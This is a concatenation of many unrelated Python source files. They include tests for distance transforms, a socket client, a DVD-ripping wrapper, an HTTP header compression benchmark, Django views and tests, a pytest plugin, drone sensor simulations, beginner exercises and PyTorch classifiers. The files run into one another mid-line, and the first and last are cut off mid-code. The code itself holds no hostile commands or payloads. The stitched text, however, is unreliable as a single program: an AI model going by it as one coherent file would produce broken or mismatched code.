transform_utils.inner_distance_transform_3d(unique, bins=bins) distance = np.expand_dims(distance, axis=-1) self.assertAllEqual(np.unique(distance), np.array([0, 1, 2, 3])) self.assertEqual(distance.shape, unique.shape) K.set_image_data_format('channels_first') unique = np.rollaxis(unique, -1, 1) bins = None distance = transform_utils.inner_distance_transform_3d(unique, bins=bins) self.assertEqual(np.expand_dims(distance, axis=1).shape, unique.shape) bins = 3 distance = transform_utils.inner_distance_transform_3d(unique, bins=bins) distance = np.expand_dims(distance, axis=1) self.assertAllEqual(np.unique(distance), np.array([0, 1, 2])) self.assertEqual(distance.shape, unique.shape) bins = 4 distance = transform_utils.inner_distance_transform_3d(unique, bins=bins) distance = np.expand_dims(distance, axis=1) self.assertAllEqual(np.unique(distance), np.array([0, 1, 2, 3])) self.assertEqual(distance.shape, unique.shape) def test_inner_distance_transform_movie(self): mask_stack = np.array(_generate_test_masks()) unique = np.zeros(mask_stack.shape) for i, mask in enumerate(_generate_test_masks()): unique[i] = label(mask) K.set_image_data_format('channels_last') bins = None distance = transform_utils.inner_distance_transform_movie(unique, bins=bins) self.assertEqual(np.expand_dims(distance, axis=-1).shape, unique.shape) bins = 3 distance = transform_utils.inner_distance_transform_movie(unique, bins=bins) distance = np.expand_dims(distance, axis=-1) self.assertAllEqual(np.unique(distance), np.array([0, 1, 2])) self.assertEqual(distance.shape, unique.shape) bins = 4 distance = transform_utils.inner_distance_transform_movie(unique, bins=bins) distance = np.expand_dims(distance, axis=-1) self.assertAllEqual(np.unique(distance), np.array([0, 1, 2, 3])) self.assertEqual(distance.shape, unique.shape) K.set_image_data_format('channels_first') unique = np.rollaxis(unique, -1, 1) bins = None distance = transform_utils.inner_distance_transform_movie(unique, bins=bins) self.assertEqual(np.expand_dims(distance, axis=1).shape, unique.shape) bins = 3 distance = transform_utils.inner_distance_transform_movie(unique, bins=bins) distance = np.expand_dims(distance, axis=1) self.assertAllEqual(np.unique(distance), np.array([0, 1, 2])) self.assertEqual(distance.shape, unique.shape) bins = 4 distance = transform_utils.inner_distance_transform_movie(unique, bins=bins) distance = np.expand_dims(distance, axis=1) self.assertAllEqual(np.unique(distance), np.array([0, 1, 2, 3])) self.assertEqual(distance.shape, unique.shape) if __name__ == '__main__': test.main() <filename>imageServer/imageServer/client.py<gh_stars>0 import socket class Client: addr = None sock = None def __init__(self, address): self.addr = address self.sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM) def connect(self, n): for retry in range(0, n): try: print(self.addr) self.sock.connect(self.addr) return True except Exception as e: print("Retry.") return False def register(self): self.sock.sendall("Registration 0".encode("ascii")) f = self.sock.makefile() f.flush() def send(self, data): self.sock.send(data) def close(self): self.sock.shutdown(socket.SHUT_RDWR) self.sock.close()#!/usr/bin/env python # encoding: utf-8 # # The MIT License (MIT) # # Copyright (c) 2013-2015 CNRS # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, 
publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in # all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE. # # AUTHORS # <NAME> -- http://herve.niderb.fr/ from __future__ import unicode_literals from .command import CommandWrapper class MEncoder(CommandWrapper): """Rip previously dumped DVD. Parameters ---------- mencoder : str, optional. Absolute path to `mencoder` in case it is not reachable from PATH. """ def __init__(self, mencoder=None): if mencoder is None: mencoder = 'mencoder' super(MEncoder, self).__init__(mencoder) def vobsub(self, vobcopy_to, title, language, to): """ Extract vobsub from DVD title Parameters ---------- vobcopy_to : str Path to 'vobcopy' output title : int Title to process language : str Language code (e.g. "en", "fr", "es", "de") to : str Path to output (without extension) """ options = [ 'dvd://{title:d}'.format(title=title), '-dvd-device', vobcopy_to, # TVD/TheBigBangTheory/dvd/dump/Season01.Disc01 '-o', '/dev/null', '-nosound', '-ovc', 'copy', '-vobsubout', to, '-slang', language, ] self.run_command(options=options) <reponame>httpwg/compression-test #!/usr/bin/env python """ compression_test.py Tests various HTTP header compression algorithms, to compare them. """ # Copyright (c) 2012 The Chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. # pylint: disable=W0311 from collections import defaultdict from importlib import import_module import locale import optparse import operator from functools import reduce from lib.harfile import read_har_file from lib.processors import Processors class CompressionTester(object): """ This is the thing. """ msg_types = ['req', 'res'] streamifier_dir = "lib.streamifiers" def __init__(self, output): self.options, self.args = self.parse_options() if self.options.baseline is None: self.options.baseline = "http1" if not self.options.baseline in self.options.processor_names: new_processor_names = [self.options.baseline] new_processor_names.extend(self.options.processor_names) self.options.processor_names = new_processor_names self.output = output self.tsv_out = defaultdict(list) # accumulator for TSV output self.processors = Processors(self.options, self.msg_types, output) self.streamify = self.load_streamifier(self.options.streamifier) self.run() def run(self): "Let's do this thing." 
sessions = [] for filename in self.args: har_requests, har_responses = read_har_file(filename) messages = list(zip(har_requests, har_responses)) sessions.extend(self.streamify(messages)) for session in sessions: if self.options.verbose > 0: session.print_header(self.output) self.processors.process_session(session) if self.options.verbose > 0: session.print_summary(self.output, self.options.baseline) self.processors.done() for msg_type in self.msg_types: ttl_stream = reduce(operator.add, [s for s in sessions if s.msg_type == msg_type]) ttl_stream.name = "TOTAL" ttl_stream.print_header(self.output) ttl_stream.print_summary(self.output, self.options.baseline) if self.options.tsv: out = {} for msg_type in self.msg_types: out[msg_type] = [ open("%s%s" % (self.options.prefix, "%s.tsv" % msg_type), 'w'), 0 ] sessions[0].print_tsv_header(out[msg_type][0].write) for session in sessions: tsvfh, tsv_count = out[session.msg_type] out[session.msg_type][1] = session.print_tsv(tsvfh.write, tsv_count) for fh, count in list(out.values()): fh.close() def load_streamifier(self, name): "Load the streamifier specified in the options." return import_module("%s.%s" % (self.streamifier_dir, name)) \ .Streamifier([p.name for p in self.processors.processors['req']]) \ .streamify def parse_options(self): "Parse command-line options and return (options, args)." optp = optparse.OptionParser() optp.add_option('-v', '--verbose', type='int', dest='verbose', help='set verbosity, 1-5 (default: %default)', default=0, metavar='VERBOSITY') optp.add_option('-d', '--debug', action='store_true', dest="debug", help="debug mode. Stops on first header mismatch.", default=False) optp.add_option('-c', '--codec', action='append', dest='processor_names', help='compression modules to test, potentially with ' 'parameters. ' 'e.g. -c spdy3 -c fork="abc" ' '(default: %default)', default=[]) optp.add_option('-b', '--baseline', dest='baseline', help='baseline codec to base comparisons upon. 
' '(default: %default)', default=None) optp.add_option('-t', '--tsv', action="store_true", dest="tsv", help="output TSV.", default=False) optp.add_option('-s', '--streamifier', dest="streamifier", help="streamifier module to use (default: %default).", default="public_suffix") optp.add_option('--prefix', action="store", dest="prefix", help="Prefix for TSV file output.", default="") return optp.parse_args() if __name__ == "__main__": import os import sys if os.name == "nt": locale.setlocale(locale.LC_ALL, 'english-us') else: locale.setlocale(locale.LC_ALL, 'en_US') CompressionTester(sys.stdout.write) import datetime import sys import traceback from django.http import HttpResponse, HttpResponseServerError from django.template import loader, Context from django.views.generic import TemplateView from chipy_org.apps.meetings.models import Meeting, RSVP from chipy_org.apps.meetings.forms import RSVPForm, AnonymousRSVPForm from chipy_org.apps.sponsors.models import GeneralSponsor from chipy_org.apps.announcements.models import Announcement class Home(TemplateView): template_name = 'homepage.html' def get_context_data(self, **kwargs): context = {} context.update(kwargs) # get upcoming main meeting future_meetings = Meeting.objects.filter( meeting_type__isnull=True).filter( when__gt=datetime.datetime.now() - datetime.timedelta(hours=6)) # get next 3 non-main meetings other_meetings = Meeting.objects.filter( meeting_type__isnull=False).filter( when__gt=datetime.datetime.now() - datetime.timedelta(hours=6) ).order_by('when')[:3] context['other_meetings'] = other_meetings context["general_sponsors"] = GeneralSponsor.objects.all( ).order_by('?') if future_meetings.count() == 0: context['next_meeting'] = False else: next_meeting = future_meetings.order_by('when')[0] context['next_meeting'] = next_meeting # Check if user and get rsvp if self.request.user.is_authenticated(): # Is there already an RSVP if RSVP.objects.filter( meeting=next_meeting, user=self.request.user).exists(): context['rsvp'] = RSVP.objects.get( meeting=next_meeting, user=self.request.user) else: context['rsvp'] = None context['rsvp_form'] = RSVPForm(self.request) else: context['rsvp_form'] = AnonymousRSVPForm(self.request) context['announcement'] = Announcement.objects.featured() return context def custom_500(request): template = loader.get_template('500.html') print(sys.exc_info()) etype, value, tback = sys.exc_info() return HttpResponseServerError(template.render(Context({ 'exception_value': value, 'value': etype, 'tb': traceback.format_exception(etype, value, tback)}))) def customer_404(request): return HttpResponse('<h1>404 - Page Not Found</h1>', status=404) import linecache import sys import textwrap from _pytest.config import hookimpl import _stories.compat import _stories.context import _stories.mounted # FIXME: Test me. 
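# ---------------------------------------------------------------------------
# Illustrative sketch (not from the original sources): the plugin below
# monkey-patches _stories.context.make_context for the duration of each test
# via a pytest hookwrapper and then attaches what it captured as a report
# section. The same pattern, reduced to its core, is shown here in commented
# form so it cannot clash with the real pytest_runtest_call defined further
# down; the module `target`, the function `make_thing`, and the list
# `records` are hypothetical names used only for illustration.
#
#   import pytest
#   import target                      # hypothetical module being patched
#
#   @pytest.hookimpl(hookwrapper=True)
#   def pytest_runtest_call(item):
#       records = []
#       original = target.make_thing
#
#       def tracking(*args, **kwargs):
#           result = original(*args, **kwargs)
#           records.append(result)     # remember what the test produced
#           return result
#
#       target.make_thing = tracking
#       yield                          # the test body executes here
#       target.make_thing = original   # always restore the original
#       for i, record in enumerate(records, 1):
#           item.add_report_section("call", "record #%d" % i, repr(record))
# ---------------------------------------------------------------------------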
origin_make_context = _stories.context.make_context def track_context(storage): def wrapper(contract, kwargs, history): ctx, ns, lines, bind = origin_make_context(contract, kwargs, history) storage.append((get_test_source(*get_test_call()), history, ns, lines)) return ctx, ns, lines, bind return wrapper def get_test_call(): f = sys._getframe() while True: if ( "@py_builtins" in f.f_globals and "@pytest_ar" in f.f_globals and f.f_code.co_filename != __file__ ): return f.f_code.co_filename, f.f_lineno elif not f.f_back: raise Exception("Can not find running test") else: f = f.f_back def get_test_source(filename, lineno): start = max(1, lineno - 3) end = lineno + 3 adjust_to = len(str(end)) lines = [linecache.getline(filename, no) for no in range(start, end)] text = textwrap.dedent("".join(lines)) src = [] for num, line in zip(range(start, end), text.splitlines()): sep = "->" if num == lineno else " " src.append((" {} {} {}".format(str(num).rjust(adjust_to), sep, line)).rstrip()) src = "\n".join(src) return src @hookimpl(hookwrapper=True) def pytest_runtest_call(item): storage = [] _stories.mounted.make_context = track_context(storage) yield _stories.mounted.make_context = origin_make_context for i, (src, history, ns, lines) in enumerate(storage, 1): output = "\n\n".join( [ src, _stories.context.history_representation(history) + "\n\n" + _stories.context.context_representation( ns, lines, _stories.compat.pformat ), ] ) item.add_report_section("call", "story #%d" % (i,), output) <filename>No_0169_Majority Element/majority_element_by_counter.py ''' Descption: Given an array of size n, find the majority element. The majority element is the element that appears more than ⌊ n/2 ⌋ times. You may assume that the array is non-empty and the majority element always exist in the array. Example 1: Input: [3,2,3] Output: 3 Example 2: Input: [2,2,1,1,1,2,2] Output: 2 ''' from typing import List from collections import Counter class Solution: def majorityElement(self, nums: List[int]) -> int: num_occ_dict = Counter(nums) # description guanatees that majority always exist for every test input. # Therefore, we can pick the one with highest occureence as majority element. return max( num_occ_dict, key = lambda k:num_occ_dict[k] ) # n : the length of input array nums ## Time Complexity: O( n ) # # The overhead in time is the dictionary building and maximal finding, which are of O( n ). ## Space Complexity: O( n ) # # The overhead in space is the storage for dictionary, num_occ_dict. 
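# ---------------------------------------------------------------------------
# Added illustrative alternative (not part of the original solution): the
# Counter-based approach above costs O(n) extra space for the dictionary.
# The Boyer-Moore voting algorithm reaches the same answer in O(n) time and
# O(1) space by keeping a single candidate and a counter, relying on the
# problem's guarantee that a majority element (> n/2 occurrences) exists.
def majority_element_boyer_moore(nums):
    candidate, count = None, 0
    for value in nums:
        if count == 0:
            candidate = value          # adopt a new candidate
        count += 1 if value == candidate else -1
    return candidate

# Usage: both approaches agree on the sample inputs from the description.
assert majority_element_boyer_moore([3, 2, 3]) == 3
assert majority_element_boyer_moore([2, 2, 1, 1, 1, 2, 2]) == 2
# ---------------------------------------------------------------------------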
def test_bench(): test_data = [ [3,2,3], [2,2,1,1,1,2,2] ] # expected output: ''' 3 2 ''' for test_array in test_data: print( Solution().majorityElement(test_array) ) return if __name__ == '__main__': test_bench()#!/usr/bin/python import sys def main(): cubes = [(value ** 3) for value in range(1, 11)] print(cubes) if __name__ == '__main__': main() sys.exit(0)<reponame>polowis/virtComp<gh_stars>0 from django.test import TestCase from app.models.core import User from app.models import Landscape, Land, Company, BuildingType, Place, Item, AgentCustomer from app.core.services.builders.agent_builder import AgentBuilder from app.core.services.builders.product_builder import ProductBuilder from app.core.services.builders.building_builder import BuildingBuilder from django.utils import timezone import datetime class ProductProcessBuilderTestCase(TestCase): def setUp(self): self.load_data() self.land: Landscape = Landscape.objects.create_land() self.user: User = User.objects.create_user('johnyTest', '<EMAIL>', '<PASSWORD>') self.company: Company = Company.objects.create_company('johnCompany', self.user) self.company.balance = self.land.buy_cost self.land.purchase_landscape(self.company) self.building = self.purchase_building() self.item: Item = self.get_sample_item() def purchase_building(self): mine: BuildingType = BuildingType.objects.get_building_by_type('supreme mine') self.company.balance = mine.get_buy_cost() building = BuildingBuilder.construct(mine.name, 'myfirstbuilding', self.company, 'buy', 0, self.land) return building def get_sample_item(self): return Item.objects.get(name='limestone') def load_data(self): Land.objects.load_land('csv_data/landData.csv') BuildingType.objects.load_building_type('csv_data/buildingType.csv') Place.objects.load_data('csv_data/place.csv') Item.objects.load_items('csv_data/item.csv') def hire_agents(self): builder: AgentBuilder = AgentBuilder(use_generator=False) builder.name = 'testJohny' builder.debug = False builder.continent = Land.objects.default_continent() agent = builder.build() self.company.hire(agent) def hire_many_agents(self): builder = AgentBuilder(use_generator=False) builder.debug = False builder.continent = Land.objects.default_continent() agents = builder.build_many_agents(2, ['alice', 'bob']) for agent in agents: self.company.hire(agent) return agents def test_product_process_builder_with_object(self): agents = self.hire_many_agents() product_builder = ProductBuilder() product_builder.item = self.item product_builder.building = self.building product_builder.agents = agents process = product_builder.produce_item() self.assertEqual(process.name, self.item.name) def test_product_process_builder_with_string(self): agents = self.hire_many_agents() product_builder = ProductBuilder() product_builder.item = 'limestone' product_builder.building = self.building product_builder.agents = agents process = product_builder.produce_item() self.assertEqual(process.name, 'limestone') def test_process_complete(self): agents = self.hire_many_agents() product_builder = ProductBuilder() product_builder.item = 'limestone' product_builder.building = self.building product_builder.agents = agents process = product_builder.produce_item() time = timezone.now() + datetime.timedelta(seconds=self.item.raw_producing_time) self.assertEqual(process.is_finished(time), True) def test_process_not_complete(self): agents = self.hire_many_agents() product_builder = ProductBuilder() product_builder.item = 'limestone' product_builder.building = self.building product_builder.agents = 
agents process = product_builder.produce_item() time = process.end_time - datetime.timedelta(seconds=round(self.item.raw_producing_time / 2)) self.assertEqual(process.is_finished(time), False) def test_agent_updated_working_status(self): agents = self.hire_many_agents() product_builder = ProductBuilder() product_builder.item = 'limestone' product_builder.building = self.building product_builder.agents = agents product_builder.produce_item() self.assertEqual(agents[0].is_producing, True) def test_agent_reset_working_status(self): agents = self.hire_many_agents() product_builder = ProductBuilder() product_builder.item = 'limestone' product_builder.building = self.building product_builder.agents = agents process = product_builder.produce_item() time = timezone.now() + datetime.timedelta(seconds=self.item.raw_producing_time) process.is_finished(time) agent = AgentCustomer.objects.get(id=agents[0].id) self.assertEqual(agent.is_producing, False) def test_item_is_successfully_produce(self): agents = self.hire_many_agents() product_builder = ProductBuilder() self.item.probability_per_attempt = 100 # set to 100 to ensure the item always successfully produce product_builder.item = self.item product_builder.building = self.building product_builder.agents = agents process = product_builder.produce_item() time = timezone.now() + datetime.timedelta(seconds=self.item.raw_producing_time) process.is_finished(time) self.assertEqual(process.is_success, True) def test_item_put_in_storage_after_finish(self): agents = self.hire_many_agents() product_builder = ProductBuilder() self.item.probability_per_attempt = 100 # set to 100 to ensure the item always successfully produce product_builder.item = self.item product_builder.building = self.building product_builder.agents = agents process = product_builder.produce_item() time = timezone.now() + datetime.timedelta(seconds=self.item.raw_producing_time) process.is_finished(time) self.assertEqual(self.building.storage.has_item(self.item.name), True) <reponame>embaba/swarm-rescue<gh_stars>1-10 import math import copy from collections import namedtuple import numpy as np from enum import Enum, auto from simple_playgrounds.agent.parts import MobilePlatform from simple_playgrounds.device.sensor import InternalSensor from simple_playgrounds.device.sensors import Lidar, SemanticCones, Touch, Position, Velocity from simple_playgrounds.element.elements.activable import VendingMachine from simple_playgrounds.element.elements.basic import Wall from simple_playgrounds.element.elements.contact import Candy from simple_playgrounds.element.elements.gem import Coin from spg_overlay.normal_wall import NormalWall, NormalBox from spg_overlay.rescue_center import RescueCenter from spg_overlay.utils import deg2rad from spg_overlay.wounded_person import WoundedPerson class DroneLidar(Lidar): """ It emulates a lidar. Lidar is an acronym of "light detection and ranging". It is a real sensor that measures distances with a laser in different directions. - fov (field of view): 180 degrees - resolution (number of rays): 180 - max range (maximum range of the sensor): 300 pix """ def __init__(self, **kwargs): resolution = 90 std_dev_noise = 2.5 super().__init__(normalize=False, resolution=resolution, max_range=300, fov=360, noise_params={"type": "gaussian", "mean": 0, "scale": std_dev_noise}, **kwargs) self.size = resolution a = self.fov_rad() / (self.size - 1) b = self.fov_rad() / 2 if self.size == 1: self.ray_angles = [0.] 
else: self.ray_angles = [n * a - b for n in range(self.size)] # 'ray_angles' is an array which contains the angles of the laser rays of the lidar self.ray_angles = np.array(self.ray_angles) def fov_rad(self): """Field of view in radians""" return self._fov def fov_deg(self): """ Field of view in degrees""" return self._fov * 180 / math.pi def get_sensor_values(self): """Get values of the lidar as a numpy array""" self.sensor_values = np.reshape(self.sensor_values, (len(self.sensor_values),)) return self.sensor_values @property def resolution(self): """resolution : number of rays """ return self._resolution @property def min_range(self): """min_range : min distance given by the lidar """ return self._min_range @property def max_range(self): """min_range : max distance given by the lidar """ return self._max_range def is_disabled(self): return self._disabled class DroneTouch(Touch): """ Touch sensor detects close proximity of entities (objects or walls) near the drone. It emulates artificial skin, - *fov* (field of view): 360 degrees - *resolution* (number of rays): 36 - *max range* (maximum range of the sensor): 5 pix The return value is between 0 and 1. """ def __init__(self, **kwargs): std_dev_noise = 0.01 super().__init__(normalize=True, fov=360, max_range=5, resolution=12, noise_params={"type": "gaussian", "mean": 0, "scale": std_dev_noise}, **kwargs) def is_disabled(self): return self._disabled class DroneSemanticCones(SemanticCones): """ Semantic Cones sensors allow to determine the nature of an object, without data processing, around the drone. - fov (field of view): 360 degrees - max range (maximum range of the sensor): 200 pix - n_cones, number of cones evenly spaced across the field of view: 36 """ class TypeEntity(Enum): """ Type of the entity detected """ WALL = auto() WOUNDED_PERSON = auto() GRASPED_WOUNDED_PERSON = auto() RESCUE_CENTER = auto() CANDY = auto() DRONE = auto() COIN = auto() VENDING_MACHINE = auto() OTHER = auto() Data = namedtuple("Data", "distance angle entity_type grasped") def __init__(self, **kwargs): # We use a gaussian noise, but only for the distance. 
We need to declare noise_params # we will do our own computation for the noise in the overload function _apply_noise() noise_params = {"type": "gaussian", "mean": 0, "scale": 0} super().__init__(normalize=False, n_cones=36, rays_per_cone=4, max_range=200, fov=360, noise_params=noise_params, **kwargs) def _compute_raw_sensor(self, playground, *_): super()._compute_raw_sensor(playground) for index, detection in enumerate(self.sensor_values): if isinstance(detection.entity, Wall): entity_type = self.TypeEntity.WALL elif isinstance(detection.entity, NormalWall): entity_type = self.TypeEntity.WALL elif isinstance(detection.entity, NormalBox): entity_type = self.TypeEntity.WALL elif isinstance(detection.entity, WoundedPerson): entity_type = self.TypeEntity.WOUNDED_PERSON elif isinstance(detection.entity, RescueCenter): entity_type = self.TypeEntity.RESCUE_CENTER elif isinstance(detection.entity, Candy): entity_type = self.TypeEntity.CANDY elif isinstance(detection.entity, Coin): entity_type = self.TypeEntity.COIN elif isinstance(detection.entity, VendingMachine): entity_type = self.TypeEntity.VENDING_MACHINE elif isinstance(detection.entity, MobilePlatform): entity_type = self.TypeEntity.DRONE else: entity_type = self.TypeEntity.OTHER # print(__file__, type(detection.entity)) grasped = False if detection.entity.graspable and len(detection.entity.held_by) > 0: grasped = True new_detection = self.Data(distance=detection.distance, angle=detection.angle, entity_type=entity_type, grasped=grasped) self.sensor_values[index] = new_detection def _apply_noise(self): std_dev_noise = 2.5 for index, data in enumerate(self.sensor_values): new_data = self.Data(distance=max(0.0, data.distance + np.random.normal(std_dev_noise)), angle=data.angle, entity_type=data.entity_type, grasped=data.grasped) self.sensor_values[index] = new_data def is_disabled(self): return self._disabled class DroneGPS(InternalSensor): """ DroneGPS Sensor returns a numpy array containing the position of the anchor. """ def __init__(self, **kwargs): # In reality, we dont use a gaussian noise, for the moment we need to do this # to fool the system into using our own noise in the overload function _apply_noise(). 
noise_params = {"type": "gaussian", "mean": 0, "scale": 0} super().__init__(noise_params=noise_params, **kwargs) self.model_param = 0.95 # std_dev is the real standard deviation of the resulted noise self.std_dev = 15 # _std_dev_wn is the standard deviation of the white noise self._std_dev_wn = math.sqrt(self.std_dev ** 2 * (1 - self.model_param ** 2)) self._last_noise = None def _get_null_sensor(self): null_sensor = np.empty(self.shape) null_sensor[:] = np.nan return null_sensor def _compute_raw_sensor(self, playground, *_): self.sensor_values = np.array(self._anchor.position) def set_playground_size(self, size): self._pg_size = size def _apply_normalization(self): self.sensor_values /= (self._pg_size[0], self._pg_size[1]) @property def shape(self): return (2,) def _apply_noise(self): """ Overload of an internal function of _apply_noise of the class InternalSensor We use a noise that follow an autoregressive model of order 1 : https://en.wikipedia.org/wiki/Autoregressive_model#AR(1) """ white_noise = np.random.normal(0, (self._std_dev_wn, self._std_dev_wn), size=self.shape) if self._last_noise is None: self._last_noise = np.zeros(self.shape) additive_noise = self.model_param * self._last_noise + white_noise self._last_noise = additive_noise self.sensor_values += additive_noise def is_disabled(self): return self._disabled class DroneCompass(InternalSensor): """ DroneCompass Sensor returns a numpy array containing the orientation of the anchor. """ def __init__(self, **kwargs): # In reality, we dont use a gaussian noise, for the moment we need to do this # to fool the system into using our own noise in the overload function _apply_noise(). noise_params = {"type": "gaussian", "mean": 0, "scale": 0} super().__init__(noise_params=noise_params, **kwargs) self.model_param = 0.95 # std_dev_angle is the real standard deviation of the resulted noise self.std_dev_angle = deg2rad(4) # _std_dev_angle_wn is the standard deviation of the white noise self._std_dev_angle_wn = math.sqrt(self.std_dev_angle ** 2 * (1 - self.model_param ** 2)) self._last_noise = None def _get_null_sensor(self): null_sensor = np.empty(self.shape) null_sensor[:] = np.nan return null_sensor def _compute_raw_sensor(self, playground, *_): self.sensor_values = np.array([self._anchor.angle]) def _apply_normalization(self): self.sensor_values /= 2 * math.pi @property def shape(self): return (1,) def _apply_noise(self): """ Overload of an internal function of _apply_noise of the class InternalSensor We use a noise that follow an autoregressive model of order 1 : https://en.wikipedia.org/wiki/Autoregressive_model#AR(1) """ white_noise = np.random.normal(0, self._std_dev_angle_wn, size=self.shape) if self._last_noise is None: self._last_noise = np.zeros(self.shape) additive_noise = self.model_param * self._last_noise + white_noise self._last_noise = additive_noise self.sensor_values += additive_noise def is_disabled(self): return self._disabled class DroneVelocity(Velocity): """ DroneVelocity Sensor returns a numpy array containing the velocity of the anchor. 
""" def __init__(self, **kwargs): # std_dev_velocity is the standard deviation of the gaussian noise for the longitudinal velocity self.std_dev_velocity = 0.08 # std_dev_angular_velocity is the real standard deviation of the resulted noise self.std_dev_angular_velocity = deg2rad(0.15) noise_params = {"type": "gaussian", "mean": [0, 0, 0], "scale": [self.std_dev_velocity, self.std_dev_velocity, self.std_dev_angular_velocity]} super().__init__(noise_params=noise_params, **kwargs) import sqlite3 con_obj = sqlite3.connect("test.db") with con_obj: cur_obj = con_obj.cursor() cur_obj.execute("""CREATE TABLE books(title text, author text)""") print ("Table created") import os THIS_DIR = os.path.abspath(os.path.dirname(__file__)) PROJECT_DIR = os.path.abspath(os.path.join(THIS_DIR, "..")) DATA_DIR = os.path.join(PROJECT_DIR, "data") os.makedirs(DATA_DIR, exist_ok=True) DATA_JSON = os.path.join(DATA_DIR, "rt-polarity.json") DATA_URL = ( "http://www.cs.cornell.edu/people/pabo/movie-review-data/rt-polaritydata.tar.gz" ) S3_BUCKET = os.environ.get("PROJECT_BUCKET") if S3_BUCKET is None: raise EnvironmentError("PROJECT_BUCKET environment variable not set") MODEL_S3_FILE = os.path.join(S3_BUCKET, "model.h5") MODEL_FILE = os.path.join(DATA_DIR, "model.h5") TOKENIZER_PICKLE = os.path.join(DATA_DIR, "tokenizer.pickle") TOKENIZER_S3_PICKLE = os.path.join(S3_BUCKET, "tokenizer.pickle") <filename>problems.py # Problems def is_even(x): if x % 2 == 0: return True else: return False print is_even(26572) #-------------------------------- def is_int(x): absolute = abs(x) rounded = round(absolute) return absolute - rounded == 0 print is_int(10) print is_int(10.5) #-------------------------------- # summing the digits of a number number = 123129 def digit_sum(n): result = sum(int(digit) for digit in str(n)) return result print digit_sum(number) #-------------------------------- # factorial [recursion] def factorial(x): if x == 1: return 1 else: return (x * factorial(x-1)) num = 9 result = factorial(num) print ("The factorial of", num, "is", result) #-------------------------------- # is_prime def is_prime(x): if x < 2: return False else: for n in range(2, x-1): # Start from 2 finish at x minus 1 if x % n == 0: return False return True print is_prime(13) print is_prime(10) #-------------------------------- # reverse def reverse(text): word = "" l = len(text) - 1 while l >= 0: word = word + text[l] l -= 1 return word print reverse("Hello") #-------------------------------- # anti_vowel def anti_vowel(text): result = "" vowels = "ieaouIEAOU" for char in text: if char not in vowels: result += char return result print anti_vowel("Borrow book please sir") #-------------------------------- score = {"a": 1, "c": 3, "b": 3, "e": 1, "d": 2, "g": 2, "f": 4, "i": 1, "h": 4, "k": 5, "j": 8, "m": 3, "l": 1, "o": 1, "n": 1, "q": 10, "p": 3, "s": 1, "r": 1, "u": 1, "t": 1, "w": 4, "v": 4, "y": 4, "x": 8, "z": 10} def scrabble_score(word): word = word.lower() total = 0 for letter in word: for leter in score: if letter == leter: total = total + score[leter] return total print scrabble_score("piZZa") <reponame>nju-websoft/SR3 import math import torch import torch.nn as nn from others.neural import MultiHeadedAttention, PositionwiseFeedForward class Classifier(nn.Module): def __init__(self, hidden_size): super(Classifier, self).__init__() self.linear1 = nn.Linear(hidden_size, 1) self.sigmoid = nn.Sigmoid() def forward(self, x, mask_cls): h = self.linear1(x).squeeze(-1) sent_scores = self.sigmoid(h) * mask_cls.float() return sent_scores 
class ClassifierExt(nn.Module): def __init__(self, hidden_size): super(ClassifierExt, self).__init__() self.linear1 = nn.Linear(hidden_size*3, hidden_size) self.dropout=torch.nn.Dropout(0.5) self.relu= nn.ReLU(inplace=True) self.linear2 = nn.Linear(hidden_size,1) self.softmax = nn.Softmax(dim=-1) def forward(self, x, mask_cls): h = self.linear1(x) h= self.relu(h) h= self.dropout(h) h = self.linear2(h).squeeze(-1) sent_scores = self.softmax(h) * mask_cls.float() return sent_scores class ClassifierExtWithBefore(nn.Module): def __init__(self, hidden_size): super(ClassifierExtWithBefore, self).__init__() self.linear1 = nn.Linear(hidden_size * 3, hidden_size) self.dropout = torch.nn.Dropout(0.5) self.relu = nn.ReLU(inplace=True) self.linear2 = nn.Linear(hidden_size * 2, hidden_size) self.linear3 = nn.Linear(hidden_size, 1) self.softmax = nn.Softmax(dim=-1) def forward(self, x, mask_cls): sent_scores_feature = self.linear1(x) # batch_size,decode_step,ext_size,hidden_size before_sent_feature = [torch.zeros([sent_scores_feature.size(0),sent_scores_feature.size(2),sent_scores_feature.size(3)],device=sent_scores_feature.device)] for i in range(1, sent_scores_feature.size(1)): sent_score_before = torch.max(sent_scores_feature[:, :i, :, :], dim=1)[0] before_sent_feature.append(sent_score_before) before_sent_feature = torch.stack(before_sent_feature, dim=1) cur_sent_feature = torch.cat([sent_scores_feature, before_sent_feature], dim=-1) cur_sent_feature = self.linear2(cur_sent_feature) cur_sent_feature = self.dropout(self.relu(cur_sent_feature)) cur_sent_feature = self.linear3(cur_sent_feature).squeeze(-1) sent_scores = self.softmax(cur_sent_feature) * mask_cls.float() return sent_scores def predict(self,x, mask_cls,before_sent_feature): sent_scores_feature = self.linear1(x) # batch_size,decode_step,ext_size,hidden_size cur_sent_feature = torch.cat([sent_scores_feature, before_sent_feature], dim=-1) before_sent_feature=torch.where(before_sent_feature>sent_scores_feature,before_sent_feature,sent_scores_feature) cur_sent_feature = self.linear2(cur_sent_feature) cur_sent_feature = self.dropout(self.relu(cur_sent_feature)) cur_sent_feature = self.linear3(cur_sent_feature).squeeze(-1) sent_scores = self.softmax(cur_sent_feature) * mask_cls.float() return sent_scores,before_sent_feature class ClassifierExtWithBeforeScore(nn.Module): def __init__(self, hidden_size): super(ClassifierExtWithBeforeScore, self).__init__() self.linear1 = nn.Linear(hidden_size*3, hidden_size) self.dropout=torch.nn.Dropout(0.5) self.relu= nn.ReLU(inplace=True) self.linear2 = nn.Linear(hidden_size,1) self.linear3 = nn.Linear(3,128) self.linear4 = nn.Linear(3,1) self.softmax = nn.Softmax(dim=-1) def forward_old(self, x, mask_cls): h = self.linear1(x) 